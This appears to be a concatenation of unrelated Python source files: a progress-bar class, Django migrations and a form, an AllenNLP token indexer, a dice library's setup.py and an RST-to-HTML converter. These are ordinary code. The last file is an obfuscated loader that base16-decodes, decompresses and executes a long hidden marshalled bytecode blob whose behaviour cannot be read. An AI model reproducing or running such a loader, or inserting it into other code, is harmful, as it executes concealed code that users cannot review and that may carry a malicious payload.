This assumes that the values its given are numbers of bytes.
'''
# Base class defaults to 100, but that makes no sense here
_DEFAULT_MAXVAL = base.UnknownLength
def default_widgets(self):
if self.max_value:
return [
widgets.Percentage(),
' of ', widgets.DataSize('max_value'),
' ', widgets.Bar(),
' ', widgets.Timer(),
' ', widgets.AdaptiveETA(),
]
else:
return [
widgets.AnimatedMarker(),
' ', widgets.DataSize(),
' ', widgets.Timer(),
]
class NullBar(ProgressBar):
'''
Progress bar that does absolutely nothing. Useful for single verbosity
flags
'''
def start(self, *args, **kwargs):
return self
def update(self, *args, **kwargs):
return self
def finish(self, *args, **kwargs):
return self
|
# Generated by Django 3.1.13 on 2021-12-06 07:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('xero', '0005_auto_20210308_0707'),
]
operations = [
migrations.AlterField(
model_name='banktransactionlineitem',
name='tracking_categories',
field=models.JSONField(help_text='Save Tracking options', null=True),
),
migrations.AlterField(
model_name='billlineitem',
name='tracking_categories',
field=models.JSONField(help_text='Save Tracking options', null=True),
),
]
|
import logging
from typing import Dict, List, Tuple
import torch
from allennlp.common.util import pad_sequence_to_length
from allennlp.data.token_indexers import PretrainedTransformerIndexer
from allennlp.data.token_indexers.token_indexer import IndexedTokenList, TokenIndexer
from allennlp.data.tokenizers.token import Token
from allennlp.data.vocabulary import Vocabulary
from overrides import overrides
logger = logging.getLogger(__name__)
def get_tokens(tokens) :
index_of_separator = set([i for i, x in enumerate(tokens) if x.text == "[DQSEP]"])
assert len(index_of_separator) <= 1
if len(index_of_separator) == 0 :
tokens = [tokens]
else :
index_of_separator = list(index_of_separator)[0]
tokens = [tokens[:index_of_separator], tokens[index_of_separator + 1:]]
return tokens
@TokenIndexer.register("pretrained-simple")
class PretrainedTransformerIndexerSimple(PretrainedTransformerIndexer):
def tokens_to_indices(
self, tokens: List[Token], vocabulary: Vocabulary
) -> Dict[str, List[int]]:
tokens = get_tokens(tokens)
token_wordpiece_ids = [
[token.info[self._index_name]["wordpiece-ids"] for token in token_list]
for token_list in tokens
]
if len(tokens) == 2 :
wordpiece_ids, type_ids, offsets_doc, offsets_query = self.intra_word_tokenize_sentence_pair(token_wordpiece_ids[0], token_wordpiece_ids[1])
else :
wordpiece_ids, type_ids, offsets_doc = self.intra_word_tokenize_sentence(token_wordpiece_ids[0])
if len(offsets_doc) == 0 :
doc_starting_offsets, doc_ending_offsets = [], []
else :
doc_starting_offsets, doc_ending_offsets = list(zip(*offsets_doc))
if len(wordpiece_ids) > 512:
postions_ids = [
i * 512 / len(wordpiece_ids) for i in range(len(wordpiece_ids))
]
else:
postions_ids = list(range(len(wordpiece_ids)))
token_mask = [1]*len(tokens[0])
wordpiece_mask = [1] * len(wordpiece_ids)
wordpiece_to_tokens = [-1] * len(wordpiece_ids)
for i, (start, end) in enumerate(zip(doc_starting_offsets, doc_ending_offsets)) :
for j in range(start, end) :
wordpiece_to_tokens[j] = i
return {
"wordpiece-ids": wordpiece_ids,
"document-starting-offsets": list(doc_starting_offsets),
"document-ending-offsets": list(doc_ending_offsets),
"type-ids": type_ids,
"position-ids": postions_ids,
"wordpiece-mask": wordpiece_mask,
"mask": token_mask,
"wordpiece-to-token" : wordpiece_to_tokens
}
def add_token_info(self, tokens: List[Token], index_name: str):
self._index_name = index_name
for token in tokens:
wordpieces = self._tokenizer.tokenize(token.text)
if len(wordpieces) == 0:
token.info[index_name] = {
"wordpiece-ids": [self._tokenizer.unk_token_id]
}
continue
token.info[index_name] = {
"wordpiece-ids": [
bpe_id
for bpe_id in self._tokenizer.encode(
wordpieces, add_special_tokens=False
)
]
}
@overrides
def as_padded_tensor_dict(
self, tokens: IndexedTokenList, padding_lengths: Dict[str, int]
) -> Dict[str, torch.Tensor]:
# Different transformers use different padding values for tokens, but for mask and type id, the padding
# value is always 0.
return {
key: torch.LongTensor(
pad_sequence_to_length(
val,
padding_lengths[key],
default_value=lambda: 0
if "mask" in key or "type-ids" in key
else self._tokenizer.pad_token_id,
)
)
for key, val in tokens.items()
}
def intra_word_tokenize_in_id(
self, tokens: List[List[int]], starting_offset: int = 0
) -> Tuple[List[int], List[Tuple[int, int]], int]:
wordpieces: List[int] = []
offsets = []
cumulative = starting_offset
for token in tokens:
subword_wordpieces = token
wordpieces.extend(subword_wordpieces)
start_offset = cumulative
cumulative += len(subword_wordpieces)
end_offset = cumulative # exclusive end offset
offsets.append((start_offset, end_offset))
return wordpieces, offsets, cumulative
def intra_word_tokenize_sentence_pair(
self, tokens_a: List[List[int]], tokens_b: List[List[int]]
) -> Tuple[List[int], List[int], List[Tuple[int, int]], List[Tuple[int, int]]]:
wordpieces_a, offsets_a, cumulative = self.intra_word_tokenize_in_id(
tokens_a, self._allennlp_tokenizer.num_added_start_tokens
)
wordpieces_b, offsets_b, cumulative = self.intra_word_tokenize_in_id(
tokens_b, cumulative + self._allennlp_tokenizer.num_added_middle_tokens
)
text_ids = self._tokenizer.build_inputs_with_special_tokens(wordpieces_a, wordpieces_b)
type_ids = self._tokenizer.create_token_type_ids_from_sequences(wordpieces_a, wordpieces_b)
assert cumulative + self._allennlp_tokenizer.num_added_end_tokens == len(text_ids)
return text_ids, type_ids, offsets_a, offsets_b
def intra_word_tokenize_sentence(
self, tokens_a: List[List[int]]
) -> Tuple[List[int], List[int], List[Tuple[int, int]]]:
wordpieces_a, offsets_a, cumulative = self.intra_word_tokenize_in_id(
tokens_a, self._allennlp_tokenizer.num_added_start_tokens
)
text_ids = self._tokenizer.build_inputs_with_special_tokens(wordpieces_a)
type_ids = self._tokenizer.create_token_type_ids_from_sequences(wordpieces_a)
assert cumulative + self._allennlp_tokenizer.num_added_end_tokens == len(text_ids)
return text_ids, type_ids, offsets_a
|
#coding=utf-8
"""
__create_time__ = '13-10-29'
__author__ = 'Madre'
"""
from django.forms import ModelForm, CharField, Textarea
from brief.models import Brief
class BriefCreateForm(ModelForm):
brief = CharField(max_length=1000, widget=Textarea(attrs={'cols': 2, 'rows': 2}))
class Meta:
model = Brief
exclude = ('slug',)
|
# Generated by Django 2.1 on 2019-03-13 02:22
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='LibraryProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('libraryAddress', models.CharField(max_length=30, null=True, verbose_name='Library Address')),
('Phone', models.IntegerField(null=True, verbose_name='contact Us')),
('user', models.OneToOneField(on_delete='models.CASCADE', to=settings.AUTH_USER_MODEL)),
],
),
]
|
#!/usr/bin/python
from __future__ import absolute_import, print_function, unicode_literals
from setuptools import setup, find_packages
setup(
name="dice",
version="3.1.2",
author="Sam Clements",
author_email="sam@borntyping.co.uk",
url="https://github.com/borntyping/python-dice",
description="A library for parsing and evaluating dice notation",
long_description=open("README.rst").read(),
license="MIT",
packages=find_packages(),
install_requires=["docopt>=0.6.1", "pyparsing>=2.4.1"],
entry_points={
"console_scripts": ["dice = dice.command:main", "roll = dice.command:main"]
},
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Other Audience",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Games/Entertainment",
"Topic :: Games/Entertainment :: Board Games",
"Topic :: Games/Entertainment :: Role-Playing",
"Topic :: Games/Entertainment :: Multi-User Dungeons (MUD)",
"Topic :: Games/Entertainment :: Turn Based Strategy",
"Topic :: Utilities",
],
)
|
#!/usr/bin/env python3
# -*-Python-*-
#
# Contains the process_rst() function, which turns ReST files into
# HTML output that can be included in a page.
#
import io
from docutils import core
from docutils.writers import html4css1
class WeblogWriter (html4css1.Writer):
def __init__ (self):
super().__init__()
self.translator_class = WeblogHTMLTranslator
class WeblogHTMLTranslator (html4css1.HTMLTranslator):
doctype = ""
generator = "<!-- %s -->"
content_type = "<!-- %s -->"
def __init__(self, document):
super().__init__(document)
self.head_prefix = []
self.body_prefix = []
self.stylesheet = []
self.body_suffix = []
self.section_level = 1
def visit_system_message(self, node):
pass
def visit_document (self, node):
pass
def depart_document (self, node):
pass
def process_rst (filename, body):
"Parse 'body' as RST and convert it to HTML"
output_file = io.StringIO()
body = core.publish_string(
reader_name='standalone',
parser_name='restructuredtext',
writer=WeblogWriter(),
writer_name='html',
source_path=filename,
source=body,
destination_path=filename,
settings=None,
settings_overrides={'input_encoding':'utf-8',
'output_encoding':'unicode'})
return body
|
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b16decode("789CED7D09781CD779D89B5D2C80C57D1120780E49110429E15A5C04259022095E122F2F4981A2CC6C063B036080BDB8334B0232683B96EBCF69D3D87224CB75E42B75DCA47595D64913E7FCECAF4DE2A4B19DE48B73D5496CBA8E93A66E92B6768E3A71FFFF7FEFCDB13BBB58502225C7E2F1F6CD9B77CDCC7BFFFDFF2FC9C49F08FC7F14FE5BDF0833A6C33F85A518BBE6E415764D91F910BB1692F930BB1696F91A76AD46E623EC5A44E66BD9B55A99AF63D7EA64BE9E5DAB97F928BB1695F90676AD41E61BD9B546996F62D79A281F62A966966E61D75A98B2DAE6BB3D9BD9C16A8C56B6DCC0F25F648AA2188C2D4195307B46614A26C6AEBA0DA86F6F8366C56D50C31B28EC2AD68EB0543B4B77B06B1D4CC1EB5A1C2EDDC9AE7532C5E8628642B5E1676913D3EBF845135BEA64CFC04BEC6646375BEA61C6667E032E7A19DEDEC296B6620D1D5E4314EE298A7E822D28583DB18DE94DECEDD07A3BD39B29B383E9F0C83B99DE4A972AD3DB98B68B2D407E37A6DA1E4A1FA0742F95F751BA8FD27E4AF7537A80D207297D88D2014A07291DA27498D2114A634C6F67D746990E6F608CE99D348171A677516682E99B2833C9F46ECA1C647A0F65A698BE99328798DE4B998799BE85328F307D2B65A699BE8D328799BE9D324798BE83328F327D27658E325DA5CC31A6EFA2CC71A6EFA6CC0CD3F750E604D31FA0CC49A6EFA5CC29A6F751E634D3F751E60CD3FB29F318D3F753E671A61FA0CC59A63F4899734C7F8832E7993E40990B4C1FA4CC45A60F51E60D4C1FA64C9CE92394B9C4F418652E337D943257983E469927983E4E9959A64F50E62AD32729F324D30F52E61AD3A728F314D30F51E68D4C7F9832D799FE0865BE87E9D3944930FD3065BE97E94728A331FD51CACC31FD2865924C3F46199D1906D38FB3B7C3169E67C602D367D87288E5FF3A6C8CE3E25332B41B2EF59F84ED6F7E1BFE9CEF57206B37407279316F68FAC56C366575C365CECCC5543363D95A2AA5A68DE4A296319F36AC4DC5B7F2C68D8261D916EFA81592E3D94CC648DA663673229FCFE6F98D3A488EE5B3B72C236FD740BE60CF1FB4EB2193D65612B699364CAC66E144AE409D81A30B46C6B666E1F242CEC86B4353830787D5FEA3193D9F35F587552A54CF9919736874623036188B8D8F0D8D8C4C0D8E8CC61E56AF3CAC9AFA7EF5621E26961D8A0D8EC406C762A3EA1346DE82590DC1E5C8445282431CF7388E8D4F0D6FE7D4691BC0026CEF10BD32000197FA4370EBBCD506E9D6A7461E9E1A493FB5EBBA7AB9601772FD617C3ABC9FB56CCC5BAB163DA0B162DAFDD8BF9B58584D5FB06BE167D94815B47C2F96D6D02C224A12678255C2724698AC3CC2D6685E3D33D787D96D8539B35BE390485C8769B630F45204A126DEB901208FA61FA6E963F70D0B6FEA7AE9D4979F7EFB917E9C451C139A8F65EBD9826D236EB895376D8372F3A982B5484F835F888AAC9461E4E87DD8D8DFD3941AA5CF887597B4940620170AEBE911DB9536A559B106E19EDA402F72327DE7BDEF2CF7CF57E5ED25F7B144A53F546F227DE78577DD79EFC7CBFDFBD2CF3EFB571F7AEE3FC24FD94A2FBCCB33A4F8D077DEFB0BDE7FAAA830A026D48181C4C0005DC7D2779E7FEECEF31FBBF3FC0B779EFB813BCFBDF5CE73EFBEF3DCC73D192C849952B5776335CCBCE07D0BB267F99BC0DED5011A26214681F6CFE2BFE75EA4AE3F4A19E8FD7D94F9291AECADE2DFF31FBEF3FCBF56E9E7C761A8A027FB84F79F7CB00155E50FE73CD9BBA9870FC0002A0D02FF9EA341E89A9EEAFD9450D50FF007184D9F387BE6F2892A3EF3BDFA86AAE8BE6831892FF0AAFC73BFC2F3CF8AB774407EEFA3057B319B172F62247D48BE9173F1C19913C72E38CB23E00FF456A1E353A6BD58982BED78D1B673D6A1A1A105BA3F98CCA687CEE5678CB9AC3B52E58E4F1EF37C3AA7E3587AEB53634EE7F37383696328AD59833AF43C381CDBFAD4705AB6A15E2B0C20E075E000C383B2ABE03F4103BCFFD5FBF21FA0598C8EA69FBAF3E20F5D572F99296D7159CBA867B30B668663B3342033F5E88296572F9BBAB6AC1E5F3492CBB9AC99B11B0857F930C3498EAB00D003B9BB1066B701510C23A298B9DE8F4802685A400F3DA77CA80CF0D3520D12B8841CBA0572A825E480407E10DE1BCF0C3A9941D57A0032CD12EFC106BB2EBFC3D9ACA69B9905F9AE5DD41291A8251EC5A41193264C9A114D10F2881052B1CD654220D952044278D55CEE9354010BB502F2A887FF26556B26643C3A923E9FB5D5270AA98C15E525B1345ED12BC3816BE52BFB65E898BF0E9D23CED52D88B8F92B7C2684AFD0E6487436F342A806D01E4C723E44DCC2A74240B0FB1A03D23C755AA7B7D90519BC021A87F30388A4EBD9523D12FB78196276943A5E6D47520BBE06B1003890CA6AEC46B6D444A37C029918BD01BB6AE6E41AB024760BB569658936CAB433BD11F98567A0327C622CEA40B6E191B590BC68618F60AE937F74C87561EE7618D989B5305BAE65F9B9D0EAA0024C052E12A0F77BA0710F50FC3DB76B98D988543FD0FB1340EA03913F0175A0FF0920F381C09F00DA1EA87AFAD90A3FDB90909F001A1EA8F709E805DA4C00FD0E94FB0410ED40AE4FDC8E307B135BEA46921DDF462D5BAB4516698DB35D78B199E657C7D622780328C1B53AA4EB27F03E90F53073BB175928983C10F76BB88095DBF5CCDECA96B6B13578D5DBA9E7A8FC9EFDF43D1BD81A3CFB0EB6164506A0970683829D9CAC3B80AF197A55911710557AE8CBEE624BBB912FA00BB1226ECCC18A80DA7BD8D203F4ADBE2754F4ADA0C65524AF07E42B7E21049C8424268197F0F43DCC2F44C34F8780AFA85871AFB31A68C7C670C7D20E4AA60C2D4F0B3F858064D05EB1693FE5CD31B96F1CE8F76EEB98877E253024F6F1A533678F9E7EFCE879F5EC855367CEAB471FBF725E3D79F438609D0B8FAB47CFCF1C55BDADAC073DDD3CC83B199D489FD1874EA43533E5406B49B3F8EA0F38F52F6A96752B9BD74BEB231D2EF1477A705E4B02E6C82E2382B2B62309EB25C109521ED535F5F16CC658B64CA2C433790211F4860C9C1391B03918D042886069378D01DDB869260DEB145C6B3933B16CAC4E1F3C18D30E8E4D0D8F4E8CE8DAD4C1C9E1D8DCFCD4A4361C1BD1F5E4C8989ECC1B3A3025A696B212F66ACE98CE8947A031A6ADEF458A399B4F6BF6F463972E9C070606A0BA6D24D25A72D1CC1809539F1E710A2DC342DC9648C2A39986353D92CA26B594316D6412572E01ADBD98D5A735200906E9C3CA91A6AD87F1EB1A76219F4958562A011C4EB6908707991EBE393D32383C119B3F9834A6E627C7E646203B961C898D2693B1D1B1D1496D4C1B8DD92AB45FEF418959136F85783439BC8D1C50F16BA0978B0F4C7C047F01B40847EC4E48035E83BDD95B5EF426F857C3B740FDF1D7422BD97D1D7487BF241A69D8EE2AF35A2C4423F05EA8DA4D422A697D9C336AE682B5CFB3D4E0817D8B6D08B94760456F1AF9C1DC628EC6CC6980A72DEAEC968D184D4BE220093BBB6C64AC61EFEA9404ED8B3F244A3C681371BE55A0A6D639CF1416F25A6ED13F09A09EE6F3A691D1AD236255E480D1EC2B98BA35BD70CB4C172C6DB4CF3B8B69D3E1E8930E05610D166D1C416A1D4D26B3858CAD9ED62CF59861643C440771BBF9B43A909F571DE0E2A078ABA7A8C353DA829652CF695661B91F71763CE27096C0101B695A25D91C2C9C1AFA769902ADACC78D551212D0923B7381E76B383CCBDA08D8F2DAAD046C00E04DEB68D5D8B818E3B8B268AFCFE5A99623A0A05EAFC4CF524F71BCA0EE2EE70BFC5602DEAE9DCDAF526FA69558B4D3299BA0829132927602D72FB5A00CCDBF3097366DCA2EE00A4B51D345CD5A4C9973B49232C62DBA5DC8E9B0A0693E8BC68A6E2EC002A241A58C846A432734C09295CDD0624F0119C56506B6B162C71B24E84AA6B216DF5DF8C95D028ABEADB19234722863B1E28A6C409FA9BFD121AF6039D8F49260CBE1C8B95BFC179E21BE5FBE1998B2460B7A85522D8E129E788BBCFDB4A1EB25C459FC2CFC9CC0EB252C059A2CACB42A8D4A27E4224A14FE37C1751D9422CB1F511A434DC4FA372B0D70A709CABB954B0AD2734D4A9752AB6C523AE0AA1DEE4620DF4C3D4594166815E1AD42FC97883A7CA11149D4D5C384567B91AEE3D430E07D40A2484D30369B9901EA8A13700924AD04FDCBE5C340BB01CEF552C4F0D2966A51DE4B17751CE77E955D5DBD49E45C14A93BA0B07B048507A44423D24F40BC71220FA99F7AD60BD4CA1A5178BD404C89860D4EC3886C18910D6B19100240050159D70B741DD229400ACD669661F22D34F96D4AC9E49BAB9A7C3F74518FB4E3521B75749C3A6A47CAB5053BE870A94C6FEFBC462B0A9D8136EC22C2100A3A91B2E901C2D0A61CD4DC0CD41EDCEEA6DB44D1C9DB3525B7372351276FD795DCEE7547DB42055B710EDB30D98EC90E4C7662A262B20B93DDF80C5DAE946E0FD2457E6A88AF66C40ED616E697DE21B05433C03CCC0308D4D701770FAE07A58FF860306D9D8C9636E2E771E8C975613C00192B9937E780E32DEAA98E40503AAD01CCA2AD9DB5B55482C0B635E27F2401D42F19C04EDA66665553B5E54246856E342F60DF56F4228A69283FD9F89C89E426E151A421F9EF0BD621FA7DB63CB6935284F3F0164A3878731F135241594D74FC6CF51D9F3C7666A6A4E3EA9B5F82375EDADCF7E81F1693FA80B587F73A709853AF930F8F0DA74706559454AB67329CE64158DC1F502F3608E835B9AC9E149F5C154897E8DCE2CAA383EAB1AC6DF506DC1A1B542FD88BB04002EF8EC36C08FD04DE9D18444943B66013DEF6DC1DC1BBC383EA8915D3162CB56C03B5FA69F70C495C80FA81784C22F738D2142E56229C109FC10431431C25147124AFE3A71971D62863CEC771C9C61FC704B14D7C14937A592165708C983353E6623F16C7CFC97B59FB56FC929C096C2D8DB696B8C549328E8D612B95222C24CDDE8AD797096185955E42281CAD3486C280703A00FD34D0EF66CFBD06424588C2B0A45DD9497FDBA9CCFB97509314E0136ADAAB30819710A23392E287481DB30F012D802E8583DFBFA75B35746B1AA91A2AFDEF541AA1D24B523291F91C95D652A989EF824A3F49A57554FA1644FE54FA23545A4FA5BF8AB4D8529D143C005600F8D98038A70B26C26F354975026017CA71A145E61AF5D342FDFC8DECA7554A41F0A28D5F34F0FA07A87E3BD56F764ABB50A3885810F0488FF3F004B7BB086E6FA69589323A4740FDD372B3DAF42DBBFD80EBB896D967AB463A67AFC67732A19088513A4AE918A5E304FE031962EC70C1B4D55C219552B37913E9F2B406E46ADE42B58543DF4A09D731DCC7129050E713817883D0C58ABE308004AF1ACCCB0EE5CDA79F1E4C6B0BF013DF8B93EB625EF6FCBDD7E5A8A47393C3A2B44BBB09FCA63667A488D68BE393C59FC21780A8CFE4E00858614E17670A89459836D7B5E1D55C96D39F29CDCC783632EDC461B91D496917BFCC02D45734D44FE0F504AD7924E82240A23595FCE7C420EE217ED52CEE0842AE4EFCA7DDF29325D2B95E9F748EEBB788AA9B64289C73A83A4EC8F1A615682124727C023CDA0275B841700B44C5D6E0941D6C0DAA43A239D824927A0B21ADB6D48204DE12ED0020F656BEA9A05C0A28B799EBBFA3DC26C12BD03FB0897A976B99F53579DD42D7F94F33D16BAB2CED81FDD3537E84087366B9DA8EFB0A4847EC1C36D16CA61BDE05A7ED1E43DA0EB6D8A9D39949E52AD6ECA49A2D25356DAAD98535FF3DA39A9BA8667749CD0F52CD1EACF924AFB9996AF696D4FC0CD5DC8235E145AF6E42E120D6DC06346DE95CBF49B5B7CBDAED680380B57796D45449CCA6CA9A6719517E2B8F52F5DDF8CAC79082C601F71011FD803BE08DB190EC6681BAD90B4DA1F02AFC9F9DCDB43B83BC15EFD20289A215812081B96C8EC1BF597D1FE34BC477936017EE8CF39CC02C253C5F16CD1908B10EB312D91B902D67903F56CFCC888A43A218492F51593DE44013AF38EECE8B3FE774722EBB98CDA8970B99858582AC3C3838682160A84E40E1235CE36F4008720513A281B756EEC6428ED3DF837FA61FFC5967A6F05C5A893AEC906A4D79EA1F59AFB6A8E850BF6547735EAB57BD5476B432B5AB1E8D64A8C55D1C52E348B79519B24C93AA873C9F4D67F3EA652395CB669C6E0EA924DF4A67E7CC9491C8C1D230CABDDFE0E61E7CC517FBFE32C39FCD2E03B6F2CD1F06AF675CF64764F564E0C0810D4B9EBABFDCB0DAA2990F1A75CECCDB8BBAB64AE82D60D4807625833E5466D04BC67236A52D167D2C18186187A117C4F3EE719B07A836DF2C7727174F2517D164E7A16A9A78A7B83E8163ED2C26482E1A081C809B74BAE9EF603E76007985F8554C884F28E20E461D7205215F5966813309488BF4237D403C00011102AA44E427B35C7198E3922ACCDE28A55416E0E70B784DF42389A97A3D543FA74F9A04D5DFAEA840D97740098AAD9A9568A8FCEFA6A26BE40C78693BF45A136A505A424013B95C8123B07A89BDAA740E103944F843D288491326CD5220043409246D1CD93928AEFDFEA2B8475820AF8DB65E458C74BFD85597B5FC82618B2EF6D3560860C2CF1552B6A91ECB176C0328E4A4E1F463C5021A00237EA99003F6BE7CB3B18066C0A453D59354B5CC0477043404FEFD490D76B27A3C85A0F681802AC0C41F4D03380644CF556D43A72F96E3E7712307F0F30D1BDDAD246B46FE21C1797245EEC7D2CDB6083FDBE03E41DC729B6D7DB6F94BAC4AB6F93F05B2CD1FF2B0CDD724DB2CF9E4B779B8E79CC327A73CDCF33B90BFA5D2273CDCF38B4CEEAE47A9344AA59F40E9AE87E36DA0D2CF48653F72BC9C73805D56C4F1E24BAECCF1C635B63EC71B9FC304DF615CC7C4C0641E93CA0C25EEE81204CD170741678B09390BDAA4705D441E79C8082D06CB4C715340DC1F949BC3254F4B8538CC555CC8D41E08BD390EC815D9252EA6D2C583238EE1E239400BC2CF53D60572970E1FD9E485AF46E41EC3D750645DF8BAFA33357654F090829F6CF4F2934DDCECA2B912D71746CE6D8D4C369099C13EDABC936A97221760F9028BF988CEC4B0AB4EE08DBAC8C603189F25CEF7E144BA612228BAEF715414CD6847427616C85D21D7574B360DCF29C0FBC1536EF14C0D393D8544F6DB4803C039A5ED7C229D421415460EAF96383CECE7CBA21FF56E3ABB12960FB30B1EA62EE061EAAA7A182DB4CEC3D4058FFF8590FF615E0A55F330653A7B6708EBEF165FA63EE061EAAB7A98C1F03A0F531F3C7E7DD1C3BC295CCDC394E9ECE74912B287F5DE8EA249CD5217F2E3C076736B9CD2476BA8EAD1A235EB3C5A43F06C0614FFA33D5153CDA395E9EC4BC8FCDF6E0C7888C6AA1EE273EB3D4463F0B88BCCFF105B23D53C4499CEB6329264E8FD2CE0EE6C661F00C44D0410BF378200717F5035C70AE9C0FD250BBD2C957AE6FCC90B2AF44A74959A2E58B63A67A8ABD9425EE5C2087597AF81475432235B49DD8FA3813AC08205231753866619EA2DCDB4BD7291BB1068EC6665051A869C06F0FA2834B1F6064E9FD4781E9B4B9808779C381058FD02CA9F2D2359C89BF6AAA70DE1EA79336FD909D452124B35121BB59EF53CD3DC4089450CB74019720D71FCCF171B9D9C1C9F9A1A9E1A9F1A99181FDF1B1B8F8D4F1E1F9E1F191BD6B439439F9F9B18D792B1496D7274CAD047B4586C62746EA44FD84CA13D449FA52F276E72B3DFE9589F30AC421AB7CF6B1FD5E7DA4321BF88ADA6CDACD557DEBAAACF3217A647E7C7C7C7E7A7A6601E23F3497D52D386936363F3E307E7C76331637E22FE50F1CA75DFE4495CB6863E4854BFBC4DBF81363EDE2F2AE4457D653E3E2A1133BE0550B6AAB499F354AD828DC7BD76EBD62DDFA7E40207B49149A4AD05DFEA29B50E3AA7ADC2EE7235C844F3C172191BA76E529A5846F13413BCF81091AF5C3EA1AD6A990592227A46B894CDE7571F52513F82AB597E4FD5E67B731EBEBBA1AB87FA4B94D5F955358B5A5095AF45BE0DBD1578070EA4E9EFDE28CB538580825BFBE453680054C7B38E69135AF3102F4477F2462E05AF9D241AFD4D92797285195CA549C6394F8F90C894DEDFAA288A89DF516EDF83A2275132267EC74B696914765C465AFA9B444B9763C4C224F9D8AA74908646FE8F2A2DCA4EA555E1A63751F88BDA9B3662D6DCEB57AA4E038CBE7EADDA2AEAE05583D248CF29E42EF8821CEBEF23CA3DE60BBE589D7E496B600E6FA035B2D537E32C905EA759684D484108DA7DE538B35B845A76E6FA38B11264CA039C83DD8EFC0192FB2CC44D8F96B8310F606920BBD68403D82FB0D995CD68713373BD4D98282D6DE29A8D6FB1598EF1F9A31E22954CABC0F882D5E8F663FC8EFB8BF103EC8C1110036450018B17D96E1429361E2C8199A5F53786EFCD7EB9F1398CA2CD0E396E8EE179709AA0FBDCEB0368BE837BEE0A4ED1844C3D655A1C2A1320E5F68B300D8262549E0718CC2D136D72F304A04B4DB9D32767E781C7E72CBE054FC8CD2D79658BAA6A3900713A375D042C40308E3C0B39488BB3B20AE302FCFC1102249C31AB2927866D222B4214C66E861405A91D21CF76C6F9386C7E2FDAFDFD0E1A2BD87CC78584AC88BBBAF0DDACD5B0958FE36ECDFFB6D8B3788BF6EB6DB216241A3ECC7A6CE4B180DBE49E1A4B0D62FFA0DF0171ECDCDA0DF9E666DC923659B7A1B0E7FBD9C50C899B805745EAFCEB24BAAA253F9010F20368E6D78AE30018E0C344895550F0461BDFB1EDE4B4D1C06723AA09FF008004935A33CBBC8584068E52397F85CC345AE438DCA522789C5A679C4E1AA7B5D2383DCCEE22064661FE3BDC8363896C02ED1E7C0FCF08CF11BC92AF84CA3A9CB276A7ACD329EB9465D43FEF75338748FB10221D66E8678110E9EF1C35B54DCEF3C073919BFE36A8B10D5D3E967650BD2ED2ED760B153101AA1E025404955EA7689985C0E3989127C91DC16B849464DBA6AEA9DC2DD825A32605591B73C8DA49206B3993114449C6DF2C87386E70F2902C604AFA1B85FEDEEFF447527EC7A9CCA1A33F594C471F47B9A3E3CFE7E5D65C19E644FAB0538A0E22EAF461A9AB336F1ABE861369E2AB2418161547395B555C732BF39BB8BB7EEDEA5CC15A758D43BD988FE4ACE7B36AD2A9DCBFD381E7EF96409D83D95CCAE4F6D9855CFC3D58CA6DC53500E719E16D6DE7CD5C1CD770FC194CDEEED0A2FF8C0979EA1CBCA0F8352C22F9ED19D9CF9CF8E0F17F254B9286877C5F407B7D8F8FDE934C3AEA15E11BA2811D833D52C8F1710BCB1A755B10FC4BFC22567A83BC9FCE09D7F139D3D2B8CECE0810FCBE172F204F960DAC163100AAE03A946EC861BE866CC97B010B00CE00B2CFCD23B9FA84B28970441B600DC74BB24662090C1F709A1B86030DB6D289D079E67AA34015A74EDF6807FAA8135108952A08F7A01400D169400B4898853D900D0051C415E1E320E703E916BEF4476131AC0035C03919717B60E0B0CA1DEF3F8CC9479C374F1FF04798B4BEC2A7882798E00692A5AFED26FC1CC0D786341952A951D244E27F45D9C45F05F322CC0FB16AE85FC0989CFE8D54A47FB9D55FADA47383F58ED1AAF48EC23C905E690B7B85E94B825A81DF08A140809291839BF97C36AD9EE4462D81A6BF315FCD53F96C2147B29D0025A2B7475809F41401FABAC78DF49C06545CA9CA8EF664105D782E60B3BA7A3B6C462ABB04A969822351C46FC1CF415C46BB69EFACA7B3A365D5E25D56A17095DABA9190ABADFB18AE3C58707239E102E3445317ED31EE36AB3816AB825041FE8753670A7A5070BDC9CAEF2BE86DD180A6603D44B135B1A566928B36729FCF1BEF8435FD0905876FA2E15F502A0D2FCD5F81DA5B3D2CAD5D5BB86F43AB433405CC2582B4119AA5B50B2BB67D8E03C7A38E6D1E76DFC9876D75F70D1FA48B0FB2C91DA4560E522B0709B395AFD1C3C907AE930F5CE73EF0AA329BF9347D8A6E7AE0C15085075E3D4E1FB087BAAF472F72BB0D05FCFA66020B64EA3673BD97BC6BF94851C16BD2585F5166676F5C0DD50061874F7A8088B1DEA027855A5785A6740B4D6B26249C375053BA956B4AB77935A5DB91EC0426D46EF281607D07576DED64DCD118DDDF1BC8FDBD81BBBF37A2428564E040740275B9D4CB09604E46EEE113FF97A159F725F06842B781FBDE46FA0A7815F0A0CD4865AE35D1F821F244E68FB5CFFB58AE15E02BA0CF2D6BA93CC48278DB7346664123930053572F036D9979C50CF7484285EA656B207068E0C009EE0591667B2B0FBC80ED868E9840EB222CF17B2F1261589D7C555DC8C3F8C5A373E97911B2E053DD0853BEAE787F1CEEC33B4C93CBCEBC69A4746B1AC9A0874CBD2F65A64D7B7A4AFEF13F21E9EB372ADCE028B0A2A461033A7F6EBEA515D904BAD3B88C3E466A897BCD5D188F56082B8122D1E6AA5900D1A743742711B523CE43CA1285A8D61F8609FD00645EFD95B0438A10B31B02901A7234EDE4EA8692B08800A9084FC3AC9724003512E44778D35AA11BAF73347C618CECE06AF8EAA586EF8388AAA84D8368031048588603E0CA0C8475EEE7270CC13FE7F0E2C1F5FF8134C36D30AF76AEE62E99575D55F39A50BCF3AA2B19E7F9907F5E86E29D97A80F951708FE66E6695A1DE275D5074CABBEAA697DD637ADFA9269FDA3E29FD63FF8A6555AFF738A9C17BEAE68C0BCA255CDCB0879E7152D1967BE685EF0FA5A2BD59F5084B58288471145448FB28C10A9934B66D958D52C1BC3DE5936968CFA29E69FE5C361A0052AD47F37520088FF4A